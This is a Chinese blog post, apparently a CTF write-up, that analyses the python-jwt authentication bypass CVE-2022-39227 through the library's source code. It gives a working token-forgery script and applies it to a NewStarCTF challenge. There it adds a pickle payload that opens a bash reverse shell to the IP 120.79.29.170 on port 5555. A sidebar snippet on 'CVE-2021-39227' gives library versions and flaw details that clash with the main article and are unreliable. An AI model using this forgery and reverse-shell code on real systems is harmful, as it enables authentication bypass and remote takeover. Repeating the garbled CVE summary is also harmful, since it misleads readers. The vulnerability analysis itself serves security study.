记CVE-2022-39227-Python-JWT漏洞

python-jwt身份验证漏洞剖析,
最新推荐文章于 2025-10-16 22:48:38 发布
原创 最新推荐文章于 2025-10-16 22:48:38 发布 · 3.1k 阅读 · 9 ·
CC 4.0 BY-SA版权
Aiwin
文章标签:

#python #web安全

文章揭示了python-jwt库中的身份验证漏洞,影响版本3.3.4以下,涉及payload处理错误,演示了利用和修复过程。

文章目录

前言

在Asal1n师傅的随口一说之下,说newstar week5出了一道祥云杯一样的CVE,于是自己也是跑去看了一下,确实是自己不知道的一个CVE漏洞,于是就从这道题学习到了python-jwt库中的身份验证绕过漏洞,顺带做了一下简单的代码分析。

影响版本

python-jwt < 3.3.4

漏洞分析

这个漏洞造成的原因更像是库的作者在编写代码的时候疏忽导致的,使得验证的payload内容和返回的payload内容并不是一个payload导致的,下面来简单分析一下。

先给出github上作者漏洞修补的大致payload,利用payload进行测试,如下:
python-jwt库地址

from json import *
from python_jwt import *
from jwcrypto import jwk

payload = {'role': "guest"}
key = jwk.JWK.generate(kty='oct', size=256)
jwt_json = generate_jwt(payload, key, 'HS256', timedelta(minutes=60))
[header, payload, signature] = jwt_json.split('.')
parsed_payload = loads(base64url_decode(payload))
parsed_payload['role'] = "admin"
fake = base64url_encode((dumps(parsed_payload,separators=(',', ':'))))#这里separators就是消除了空格,不加似乎也并不影响漏洞。
fake_jwt = '{" ' + header + '.' + fake + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
print(fake_jwt)
token = verify_jwt(fake_jwt, key, ['HS256'])
print(token)
  1. 首先是刚进入前面的代码。
#判断是否存在可用的签名算法
    if allowed_algs is None:
        allowed_algs = []
#如果可用的签名算法不是列表,抛出异常
    if not isinstance(allowed_algs, list):
        # jwcrypto only supports list of allowed algorithms
        raise _JWTError('allowed_algs must be a list')
#以.分割jwt的三部分
    header, claims, _ = jwt.split('.')
#取出头部分进行base64解码和json解析
    parsed_header = json_decode(base64url_decode(header))
#取出头部算法中的alg参数,此处就是PS256,如果为空或算法不允许,则抛出异常
    alg = parsed_header.get('alg')
    if alg is None:
        raise _JWTError('alg header not present')
    if alg not in allowed_algs:
        raise _JWTError('algorithm not allowed: ' + alg)
#ignore_not_implemented默认就是False,遍历头部的键,是否在被JWS所支持,不支持抛出异常
    if not ignore_not_implemented:
        for k in parsed_header:
            if k not in JWSHeaderRegistry:
                raise _JWTError('unknown header: ' + k)
            if not JWSHeaderRegistry[k].supported:
                raise _JWTError('header not implemented: ' + k)
#对签名进行验证,对jwt进行解析,这里传入的jwt为原始的jwt字段
    if pub_key:
        token = JWS()
        token.allowed_algs = allowed_algs
        token.deserialize(jwt, pub_key)

这里的base64url_decode()是一个用于解码Base64 URL安全编码的函数。
Base64 URL安全编码将标准的Base64编码进行了一些修改,以便在URL中传输时不会产生冲突。
具体而言,它使用"-“替换”+“,使用”_“替换”/“,并且将结尾的”="去除,并且会忽略掉不是base64的字符。

  1. 进入到deserialize中对签名进行验证,代码如下:
    def deserialize(self, raw_jws, key=None, alg=None):
        self.objects = {}
        o = {}
        try:
            try:
			 #对传入的原始的jwt进行json解析
                djws = json_decode(raw_jws)
				#判断是否有多个签名,有则取出签名存放到列表当中
                if 'signatures' in djws:
                    o['signatures'] = []
                    for s in djws['signatures']:
                        os = self._deserialize_signature(s)
                        o['signatures'].append(os)
                        self._deserialize_b64(o, os.get('protected'))
				#单个签名的情况,直接从原始的jwt中取出签名字段,并且将protected以及header赋值给o对象返回
                else:
                    o = self._deserialize_signature(djws)
                    self._deserialize_b64(o, o.get('protected'))#是否继续base64解码

                if 'payload' in djws:#解析payload字段
                    if o.get('b64', True):
                        o['payload'] = base64url_decode(str(djws['payload']))
                    else:
                        o['payload'] = djws['payload']

            except ValueError:#如果json解析异常,则直接以. 分割,提取出三个部分分别赋值
                c = raw_jws.split('.')
                if len(c) != 3:
                    raise InvalidJWSObject('Unrecognized'
                                           ' representation') from None
                p = base64url_decode(str(c[0]))
                if len(p) > 0:
                    o['protected'] = p.decode('utf-8')
                    self._deserialize_b64(o, o['protected'])
                o['payload'] = base64url_decode(str(c[1]))
                o['signature'] = base64url_decode(str(c[2]))

            self.objects = o #将o赋值给objects对象

        except Exception as e:  # pylint: disable=broad-except
            raise InvalidJWSObject('Invalid format') from e

        if key:
            self.verify(key, alg)#将签名算法和key传入verify函数中

file

file

  1. verify()函数如下:
    def verify(self, key, alg=None, detached_payload=None):
        self.verifylog = []
		#默认验证是不通过的
        self.objects['valid'] = False
        obj = self.objects
        missingkey = False
        if 'signature' in obj:
            payload = self._get_obj_payload(obj, detached_payload)#直接提取出payload部分
            #直至这里,传入的解析部分还是原本正常的jwt的字符串,所以_verify也是通过的,将验证生效设置为了true
			try:
                self._verify(alg, key,
                             payload,
                             obj['signature'],
                             obj.get('protected', None),
                             obj.get('header', None))
                obj['valid'] = True
            except Exception as e:  # pylint: disable=broad-except
                if isinstance(e, JWKeyNotFound):
                    missingkey = True
                self.verifylog.append('Failed: [%s]' % repr(e))
		#多个签名的情况
        elif 'signatures' in obj:
            payload = self._get_obj_payload(obj, detached_payload)
            for o in obj['signatures']:
                try:
                    self._verify(alg, key,
                                 payload,
                                 o['signature'],
                                 o.get('protected', None),
                                 o.get('header', None))
                    # Ok if at least one verifies
                    obj['valid'] = True
                except Exception as e:  # pylint: disable=broad-except
                    if isinstance(e, JWKeyNotFound):
                        missingkey = True
                    self.verifylog.append('Failed: [%s]' % repr(e))
        else:
            raise InvalidJWSSignature('No signatures available')
		#如果签名验证不通过,抛出异常
        if not self.is_valid:
            if missingkey:
                raise JWKeyNotFound('No working key found in key set')
            raise InvalidJWSSignature('Verification failed for all '
                                      'signatures' + repr(self.verifylog))

这里经过验证码后的token其实是原本正常的jwt,跟伪造的payload还没有关系

file

  1. 代码继续往下走
#json解析.分割出来的中间部分,即我们而已构造的payload
 	parsed_claims = json_decode(base64url_decode(claims))
	#获取一些时间参数
    utcnow = datetime.utcnow()
    now = timegm(utcnow.utctimetuple())
#从header头中获取到类型JWT,并进行一些判断,不为JWT抛出异常
    typ = parsed_header.get('typ')
    if typ is None:
        if not checks_optional:
            raise _JWTError('typ header not present')
    elif typ != 'JWT':
        raise _JWTError('typ header is not JWT')
#从fakepayload中获取到iat的值即时间戳,判断令牌的签发时间是否有效
    iat = parsed_claims.get('iat')
    if iat is None:
        if not checks_optional:
            raise _JWTError('iat claim not present')
    elif iat > timegm((utcnow + iat_skew).utctimetuple()):
        raise _JWTError('issued in the future')
#获取jwt令牌的生效时间,此时是否有效
    nbf = parsed_claims.get('nbf')
    if nbf is None:
        if not checks_optional:
            raise _JWTError('nbf claim not present')
    elif nbf > now:
        raise _JWTError('not yet valid')
# 获取到令牌的过期即有效截止时间,判断令牌是否有效,如果小于现在时间,则过期
    exp = parsed_claims.get('exp')
    if exp is None:
        if not checks_optional:
            raise _JWTError('exp claim not present')
    elif exp <= now:
        raise _JWTError('expired')
# 返回.分割后的头部和中间部分即我们的fakepayload
    return parsed_header, parsed_claims

可以看出,在验证令牌的时候使用的是正常的JWT,而返回的却是以.分割的传入jwt的中间部分和头部,使得解析返回的payload和验证签名的pauload并不是一个payload,导致了身份绕过。

Newstar2023 Week5

题目给了源码如下:

# -*- coding: utf-8 -*-
import base64
import string
import random
from flask import *
import jwcrypto.jwk as jwk
import pickle
from python_jwt import *

app = Flask(__name__)


def generate_random_string(length=16):
    characters = string.ascii_letters + string.digits  # 包含字母和数字
    random_string = ''.join(random.choice(characters) for _ in range(length))
    return random_string


app.config['SECRET_KEY'] = generate_random_string(16)
key = jwk.JWK.generate(kty='RSA', size=2048)


@app.route("/")
def index():
    payload = request.args.get("token")
    if payload:
        token = verify_jwt(payload, key, ['PS256'])
        print(token)
        session["role"] = token[1]['role']
        return render_template('index.html')
    else:
        session["role"] = "guest"
        user = {"username": "boogipop", "role": "guest"}
        jwt = generate_jwt(user, key, 'PS256', timedelta(minutes=60))
        return jwt


@app.route("/pickle")
def unser():
    if session["role"] == "admin":
        pickle.loads(base64.b64decode(request.args.get("pickle")))
        return 'success'
    else:
        return 'fail'


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000, debug=True)

题目的思路也是十分简单,通过伪造JWT,使得返回来的fake_payload中第二部分的role和admin,然后进行pickle反序列化即可。

  1. 利用原题目guest的jwwt直接进行伪造,绕过身份验证

file

from json import loads, dumps
from jwcrypto.common import base64url_encode, base64url_decode


def topic(topic):
    [header, payload, signature] = topic.split('.')
    parsed_payload = loads(base64url_decode(payload))
    print(parsed_payload)
    parsed_payload["role"] = "admin"
    print(dumps(parsed_payload, separators=(',', ':')))
    fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
    print(fake_payload)
    return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"} '


print(topic('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2OTkzNjkyMzcsImlhdCI6MTY5OTM2NTYzNywianRpIjoiTUV0SEJKX1JZeVR3MmhnUmZMcnFsdyIsIm5iZiI6MTY5OTM2NTYzNywicm9sZSI6Imd1ZXN0IiwidXNlcm5hbWUiOiJib29naXBvcCJ9.nw0s5c4lL0GtUBb7IJTbIhVTE7kzNg7s4l93PrhWZmYKuxWCyZmi7cKWE63Tv3Z6sdUQVp_7IlM8yiY32mNSOwRHCADWllFo18bmlXVri_qdWR-CCVkVi6npIliEBXl_Hbpnh64dCIQuY13-gr0Y412svenGADO-uubqxT3Ml7dlpnaDZ7F06ISkg_m4syc0DQpKKuQv4xFshMYHgaxCCkLpJCMHScIxSjSjoxpD3LnNjYRXgVue8R4TcZ75ZWgaSmkNUmHUrizdTFyi0GVutnaT1Nw4yZKkS5DZxAVUYqcARLUSGvWmt1pZnyny0eR23q7Z8X7Mw-LytE-XfmkAFQ'))
  1. 这里返回的session就是admin的session

file

  1. 触发pickle反序列化,反弹shell
import base64

p=b"(cos\nsystem\nS'bash -c \"bash -i >& /dev/tcp/120.79.29.170/5555 0>&1\"'\no"
payload=base64.b64encode(p)
print(payload)

file

总结

JWT的话题总是不息的,包括一些空认证等,nodejs中的数组绕过等等,漏洞也是频出。

CVE-2022-39227jwt伪造
qq_32445755的博客
11-12 1509
python jwt是一个用于生成和验证JSON Web令牌的模块。3.3.4之前的版本会受到欺骗绕过身份验证的影响,从而导致身份欺骗、会话劫持或身份验证绕过。获得JWT的攻击者可以在不知道密钥的情况下任意伪造其内容。根据应用程序的不同,这可能使攻击者能够欺骗其他用户的身份、劫持他们的会话或绕过身份验证。用户应升级到版本3.3.4。没有已知的解决方法。
DataEase JWT认证绕过漏洞复现(CVE-2025-49001)
iSee857的博客
06-09 826
dataease认证绕过是由于JWT校验机制错误导致攻击者可伪造JWT令牌绕过身份验证流程。(CVE-2025-49001)
祥云杯2022 writeup
渗透测试研究中心
11-02 3013
0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞util ,最后好像没用到检查程序,发现apache的common−collections4,而且其反序列化利用类未被Patch一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打考点发现就是cc4附上文章外加spring−ech网上有现成的...
NewStarCTF 2023 公开赛道 Web
m0_73728268的博客
11-05 5713
泄露的秘密,直接看常见的目录robots.txt,www.zip直接那道两段flag也可以用dirsearch工具扫描,但是BUUOJ平台的网站只能开底线程,不然全是429。
JWT漏洞
最新发布
2302_80252080的博客
10-16 848
本文介绍了JWT(JSON Web Token)的基础概念、安全威胁及防御措施。JWT由头部、载荷和签名三部分组成,适用于分布式系统认证。主要攻击方式包括算法篡改、密钥破解、信息泄露和未授权访问。安全实践建议使用强密钥、限制有效期、强制HTTPS和严格算法校验。检测流程包含信息收集、漏洞探测(权限控制、时效性、算法混淆测试)和深入利用(密钥爆破、参数注入)。最后通过实战演示了利用JWT解析器漏洞(将算法设为none)绕过签名验证的方法,并展示了篡改载荷内容获取敏感信息的攻击过程。
JWT安全漏洞以及常见攻击方式
02-18 1万+
随着web应用的日渐复杂化,某些场景下,仅使用Cookie、Session等常见的身份鉴别方式无法满足业务的需要,JWT也就应运而生,JWT可以有效的解决分布式场景下的身份鉴别问题,并且会规避掉一些安全问题,如CORS跨域漏洞,CSRF漏洞等。JWT即Json Web Token的缩写,顾名思义,是Token的一种。它常被用来在向服务器发起请求时用作身份认证。使用JWT作为身份认证的优势在于:它不需要在服务端去保留用户的认证信息。
祥云杯2022复现
your_friends的博客
11-13 1286
这个CVE漏洞就是不需要公钥以及私钥就能构造出jwt的认证,稍作修改就可以更改:将里面的sub=bob改成is_admin=1然后拿出来输出一下。而我们点击页面的各种功能提示都是权限不够,那么这里也就是需要构造is_admin=1,在jwt这个版本更新之后,留下了检测是否存在漏洞的poc。苦于没有环境,我就只能口述了,利用graphql注入,注入出账号密码,最终登陆拿到flag。我这里只复现一下这个jwt伪造了,grahql只能纸上谈兵的看看了并不能实操。抓包的时候有一串jwt,解码出来之后可以看到。
Python-JWT身份验证绕过(CVE-2022-39227)
zls1793的博客
01-01 2125
python-jwt库中的verify_jwt()存在身份验证绕过漏洞
jwt漏洞
Sean_summer的博客
08-11 631
服务器会使用相同的密钥对Token进行验证,确保它没有被篡改,并且检查Token中的信息是否有效。:使用获取的密钥,尝试伪造有效的JWT。:由于JWT可以包含用户的身份信息和授权信息,如果服务器未对JWT进行有效期限制或重复使用限制,攻击者可能会截获并重用有效的JWT。:如果网站在处理JWT时没有实施有效的CSRF防护措施,攻击者可能会诱导用户在受到控制的网站上执行恶意请求,进而窃取用户的JWT。:JWT通过密钥进行签名和验证,如果密钥没有得到妥善保护,攻击者可能会获取到该密钥,并用它伪造或篡改JWT
DataEase 未授权+远程代码执行漏洞复现(CVE-2025-49001、CVE-2025-49002)
李同學的安全圈
06-10 1340
DataEase 是一款开源的数据分析平台,提供丰富的数据可视化和分析功能,帮助用户轻松地进行数据探索和决策支持。近日,有关DataEase 被爆出多个漏洞,其中 CVE-2025-49001 是由于JWT校验机制错误导致攻击者可伪造JWT令牌绕过身份验证流程,CVE-2025-49002 是由于H2数据库模块没有严格过滤用户输入的JDBC连接参数,可使用大小写绕过补丁。攻击者可利用这些漏洞实现未授权代码执行,威胁用户数据和系统的安全
DataEase jwt硬编码任意登录漏洞复现(CVE-2024-52295)(附脚本)
iSee857的博客
01-06 950
‌是一款开源的数据可视化分析工具,旨在帮助用户快速分析数据并洞察业务趋势,从而实现业务的改进与优化。DataEase支持丰富的数据源连接,能够通过拖拉拽方式快速制作图表,并方便地与他人分享‌。DataEase
第二届祥云杯 Web 题解1
08-03
考点:SSRF、session条件竞争随意用户名都可以登陆,接着是SSRF的内容,通过访问 http://127.0.0.1/admin/ ,获得include
Apache Tomcat CVE-2020-1938 漏洞
热门推荐
weixin_51194266的博客
06-21 1万+
所选漏洞:Apache Tomcat远程代码执行漏洞 漏洞编号:CVE-2020-1938 简单的环境搭建与POC验证
Cisco IOS XE WLC 任意文件上传漏洞复现(CVE-2025-20188)
iSee857的博客
06-04 898
漏洞是由于受影响的系统上存在硬编码的 JSON Web 令牌 (JWT) 造成的。攻击者可以通过向 AP 镜像下载接口发送精心编制的 HTTPS 请求来利用此漏洞。成功利用此漏洞可让攻击者以 root 权限上传文件、执行路径遍历和执行任意命令。(CVE-2025-20188)
JWT漏洞
qq_41696518的博客
06-24 1062
JWT其实就是对传输数据套了一层加密,保证数据没有被篡改和替换。没有密钥的情况下,直接修改数据时无效的,无法通过数据校验。JWT其实是明文传输。JWT对传输的header、payload数据其实就是Base64加密,可直接解密。仅是加了签名字段,校验数据是否被更改,所以JWT一般不传输敏感数据。同时程序员没注意也存在敏感信息泄露。
JWT(JSON Web Token)漏洞
Bird&Bird
08-26 8643
目录一、JWT介绍1.1概念1.2、JWT结构1.3、JWT获取流程1.4、Base64 URL编码二、删除签名五、爆破HMAC密钥 一、JWT介绍 1.1概念 JSON Web Token (JWT) 是一种开放标准 (RFC 7519),它定义了一种紧凑且自包含的方式,用于 在各方之间作为 JSON 对象安全地传输信息。该信息可以被验证和信任,因为它是经过数字签名的。JWT 可以使用密钥(使用 HMAC 算法)或使用 RSA 的公钥/私钥对进行签名。 1.2、JWT结构 JWT分为三部分,头部(Hea
JWT相关漏洞介绍
2301_77512689的博客
05-05 1552
第二部分是负载,内容也是一个json对象,它是存放有效信息的地方,它可以存放jwt提供的现成字段,比 如:iss(签发者),exp(过期时间戳), sub(面向的用户)等,也可自定义字段。JWT只通过算法实现对Token合法性的验证,不依赖数据库,Memcached的等存储系统,因此可以做到跨服务器验证,只要密钥和算法相同,不同服务器程序生成的Token可以互相验证,alg:none攻击通俗易懂的讲就是由于开发代码使用错误,后端不校验签名,导致攻击者可以在不需要密钥的情况下也可以控制伪造令牌。
JWT可能存在的漏洞(基础版)
2302_81328699的博客
07-27 1641
jwt你会了吗??ctf常考哦
JWT | JWT 漏洞介绍
Blue17 の 小窝
10-02 1200
JWT(Json Web Token)是用于在网络应用环境间传递声明的一种基于 JSON 的开放标准。它通过使用 JSON 对象进行安全的信息传输,可以用于身份验证和信息交换,是目前最流行的跨域认证解决方案。JWT 详解尽管 JWT 是一种旨在确保信息交换安全性的技术,但是如果使用不当,它同样可能带来安全风险。缺乏机密性:JWT 的 Header 和 Payload 部分只是采用了 Base64URL 编码,攻击者可以很轻松的获取明文数据。
CVE-2021-39227
07-15
CVE-2021-39227 是一个与 Python-JWT 库相关的关键漏洞,该漏洞允许攻击者绕过身份验证机制。此漏洞的核心问题在于 `python-jwt` 库在处理 JWT(JSON Web Token)签名验证时未正确校验算法类型,从而导致攻击者可以通过修改令牌的头部字段(如 `alg` 参数)来强制使用非预期的算法进行验证,最终实现伪造令牌并绕过认证机制 [^1]。 ### 漏洞详情 JWT 通常用于无状态的身份验证机制中,其中客户端通过提供签名的令牌来证明其身份。每个 JWT 包含三部分:头部(header)、载荷(payload)和签名(signature)。头部通常包含使用的加密算法(如 HS256 或 RS256),而签名部分则是根据头部指定的算法和密钥生成的。 CVE-2021-39227 的关键问题是当服务器端代码使用 `python-jwt` 库解析 JWT 时,如果没有明确指定期望的算法类型,并且没有严格校验传入的 `alg` 字段,则攻击者可以将原本使用 RSA 算法(RS256)的令牌更改为对称算法(HS256),同时将公钥作为 HMAC 密钥提交给服务器。由于服务器错误地信任了攻击者提供的公钥作为 HMAC 密钥,攻击者能够成功伪造任意有效的 JWT [^1]。 ### 影响范围 受影响的 `python-jwt` 版本为 **2.0.1 及更早版本**。任何使用该库进行 JWT 验证且未显式限制算法类型的项目都可能受到攻击。这包括基于 Flask、Django 或其他框架构建的身份验证系统,尤其是在依赖 JWT 实现用户会话管理的场景下 [^1]。 ### 修复建议 为了缓解 CVE-2021-39227 漏洞,建议采取以下措施: 1. **升级 `python-jwt` 至 2.1.0 或更高版本**: - 在新版本中,开发者引入了更强的算法验证机制,确保只有预定义的算法可以被接受。 - 使用 `algorithms` 参数明确指定支持的算法类型,例如只接受 RS256。 2. **显式指定算法**: - 在验证 JWT 时,始终使用 `options={'verify_signature': True}` 并通过 `algorithms` 明确指定允许的算法列表。 - 示例代码如下: ```python import jwt token = 'your.jwt.token' public_key = 'your_rsa_public_key' try: decoded = jwt.decode(token, key=public_key, algorithms=['RS256']) print(decoded) except jwt.InvalidTokenError as e: print(f"Invalid token: {e}") ``` 3. **避免使用不安全的头部参数**: - 对于 JWT 头部中的 `alg` 和 `jku` 等字段,应进行额外的检查,防止攻击者注入恶意值。 4. **加强密钥管理**: - 如果使用 HMAC 算法(HS256),确保密钥足够复杂并妥善保存。 - 对于 RSA 算法(RS256),仅信任可信来源的公钥。 5. **实施全面的安全审计**: - 定期审查使用 JWT 的代码逻辑,确保所有 JWT 解析操作均遵循最佳实践。 通过以上措施,可以有效防范 CVE-2021-39227 漏洞带来的潜在风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值